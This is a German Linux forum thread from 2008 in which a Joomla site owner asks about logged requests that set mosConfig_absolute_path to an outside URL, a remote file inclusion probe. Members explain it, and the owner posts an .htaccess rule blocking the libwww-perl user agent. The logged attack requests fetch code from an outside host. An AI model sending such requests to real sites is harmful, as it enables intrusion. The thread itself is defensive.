Diese Website existiert nur weil wir Werbung mit AdSense ausliefern.
Bitte den AdBlocker daher auf dieser Website ausschalten! Danke.

[reopen] Starker Zugriff von LIBWWW auf meine joomla Website

Alles rund um die Systemverwaltung, die Administration und Konfiguration Eures Linuxsystems

Moderator: Moderatoren

Antworten
Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

[reopen] Starker Zugriff von LIBWWW auf meine joomla Website

Beitrag von framp » 29. Jan 2008, 19:37

Code: Alles auswählen

vs160182.vserver.de - - [28/Jan/2008:10:37:50 +0100] "GET /index.php/content/section/1/2//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 10553 "-" "libwww-perl/5.65"
die-domain-4you.de - - [28/Jan/2008:10:37:51 +0100] "GET /index.php/content/section/1/2//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 10553 "-" "libwww-perl/5.803"
static-ip-50-188-172-217.inaddr.intergenia.de - - [28/Jan/2008:10:39:17 +0100] "GET /index.php/content/view/139/1//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 17724 "-" "libwww-perl/5.69"
online-gilde.de - - [28/Jan/2008:10:57:14 +0100] "GET /index.php/content/blogcategory/43/99//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 25490 "-" "libwww-perl/5.805"
Diese Logs sehe ich seit ca 1 Woche gehäuft bei meiner Webseite. Googeln brachte, dass das wohl Scriptkiddies sind, die irgendwas versuchen.

Weiss jemand was die Requests bedeuten - vor allen Dingen da in den Requests wieder URLs stehen?
Ich überlege per .htaccess LIBWWW auszusperren. Ich weiss, die Browser ID kann man auch ändern - aber so sind die meissten Versuche geblocked. Sperre ich da auch andere nicht boeswillig eingestellten Leute/Bots aus?
Zuletzt geändert von framp am 3. Mär 2008, 20:52, insgesamt 2-mal geändert.

Werbung:
jengelh
Guru
Guru
Beiträge: 4039
Registriert: 20. Nov 2004, 17:42
Kontaktdaten:

Beitrag von jengelh » 30. Jan 2008, 03:01

Code: Alles auswählen

man LWP
ja, damit könntest du u.U. legitime User aussperren. Aber wer holt sich schon mit wget-ähnlichen Methoden Webpages? Sind doch ganz eindeutig Kiddies. Googelst du nach "mosConfig_absolute_path" siehst du, dass das zum Mambo CMS gehört - und weil einige CMS sicherheitstechnisch ziemlich im Minus sein können (Query-Felder sind eine wichtige Sache - und werden viel zu oft am falschen Platz verwendet), ließe sich u.U. über absolute_path das Filesystem auslesen oder sonstiger Mist anstellen.

Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

Beitrag von framp » 30. Jan 2008, 09:36

jengelh hat geschrieben: ja, damit könntest du u.U. legitime User aussperren. Aber wer holt sich schon mit wget-ähnlichen Methoden Webpages? Sind doch ganz eindeutig Kiddies.
So denke ich ja auch. Nur frage ich mich, ob es auch Suchmaschinerobots gibt, die libwww benutzen, denn die will ich ja nicht aussperren.

Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

Beitrag von framp » 31. Jan 2008, 22:38

Seit ein paar Tagen habe ich libWWW ausgesperrt. Nun ist Ruhe 8).

Wie? Edit von .htaccess und Einfügen von

Code: Alles auswählen

BrowserMatchNoCase "^libwww-perl" botnetz
order allow,deny
allow from all
deny from env=botnetz 
Zuletzt geändert von framp am 4. Mär 2008, 19:03, insgesamt 6-mal geändert.

jengelh
Guru
Guru
Beiträge: 4039
Registriert: 20. Nov 2004, 17:42
Kontaktdaten:

Beitrag von jengelh » 1. Feb 2008, 16:28

Das sind eindeutig Kids. Keine vernünftige Suchmaschine ruft in einem Joomla-CMS Mambo-CMS-Parameter auf - zumindest nicht in dieser Quantität.

Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

Beitrag von framp » 1. Feb 2008, 21:39

Der Anzahl Zugriffe auf den o.g. Link nach ist das ein allgemeines Problem.

Wie schon oben gesagt: Kick wwwlib from your joomla website - and you are clean :lol:

Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

Beitrag von framp » 2. Mär 2008, 22:29

Heute scheint jemand gegen 15:45 aus Italien meine Webseite mit 3 parallel laufenden Threads abgesucht zu haben. Das 2*mit dem IE 6.0 und 1* mit dem IE 7.0 - also kein libwww. Aber das kann man ja recht wie oben gesagt leider schnell ändern.

Ausserdem ist jemand von diesem Thread meinem Link zur Lösung gefolgt. Mal sehen was das Weblog morgen an Details ans Licht fördert ...

Benutzeravatar
framp
Moderator
Moderator
Beiträge: 4263
Registriert: 6. Jun 2004, 20:57
Wohnort: bei Stuttgart
Kontaktdaten:

Beitrag von framp » 3. Mär 2008, 20:50

Heute um 8:30 von Belgien...

Wieder 3 Threads, 2 mal IE 6.0, 1 mal 7.0 ...

der scheint von Italien nach Belgien umgezogen zu sein :shock:

Antworten

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 1 Gast